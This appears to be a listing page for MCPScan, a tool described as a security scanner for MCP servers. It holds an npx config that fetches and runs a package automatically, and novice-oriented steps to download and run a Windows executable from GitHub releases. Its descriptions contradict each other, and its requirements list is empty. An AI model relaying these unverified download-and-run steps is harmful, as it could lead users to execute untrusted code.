harikrishn4101/MCPScan
Scan and identify security issues in MCP servers to help strengthen defenses against potential attacks on AI agent connections.
Platform-specific configuration:
{
"mcpServers": {
"MCPScan": {
"command": "npx",
"args": [
"-y",
"MCPScan"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/harikrishn4101/MCPScan)
MCPScan scans servers that use the Model Context Protocol (MCP). It looks for security issues like tool poisoning, leaked passwords, remote code execution risks, server-side request forgery, session hijacking, and supply chain problems. It works across different communication types, including stdio, HTTP, and SSE. MCPScan helps keep your MCP servers safer by finding important issues.
Before you start, check that your Windows computer meets these requirements:
No extra software or programming tools are needed. MCPScan runs as a standalone app.
You can download MCPScan from the official GitHub page:
[](https://github.com/harikrishn4101/MCPScan)
Click the link above to go directly to the GitHub repository page. From there, you can find the files needed to install MCPScan.
Follow these steps to get MCPScan running. This guide assumes you have no prior experience with this type of software.
Click the download badge or open this link in your web browser:
https://github.com/harikrishn4101/MCPScan
This takes you to the MCPScan repository on GitHub.
On the GitHub page, look for a section called Releases or scroll down to find files related to MCPScan. These files usually end with .exe or .zip for Windows.
If you do not see an .exe file, look for the latest release under Releases in the right sidebar or main menu.
Loading reviews...